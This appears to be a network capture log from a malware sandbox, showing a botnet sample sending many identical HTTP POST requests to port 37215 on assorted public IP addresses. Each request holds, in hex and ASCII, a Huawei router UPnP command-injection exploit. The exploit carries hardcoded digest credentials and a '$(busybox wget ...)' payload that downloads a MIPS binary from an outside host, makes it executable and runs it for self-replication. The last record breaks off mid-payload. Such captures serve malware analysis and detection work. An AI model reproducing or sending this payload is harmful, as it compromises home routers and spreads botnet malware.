                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          342192.168.2.154854041.233.149.10337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.547527075 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          343192.168.2.1560636148.155.75.5837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.547621012 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          344192.168.2.1554746157.61.156.17837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.547785997 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          345192.168.2.155266265.193.159.25537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.547900915 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          346192.168.2.1534794157.20.129.19537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.549688101 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          347192.168.2.1557446197.111.100.14737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.549750090 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          348192.168.2.153409041.197.56.537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.549887896 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          349192.168.2.1543796197.115.192.1337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.549952984 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          350192.168.2.1538050197.224.255.2837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.550303936 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          351192.168.2.1554850172.255.194.14837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.550378084 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 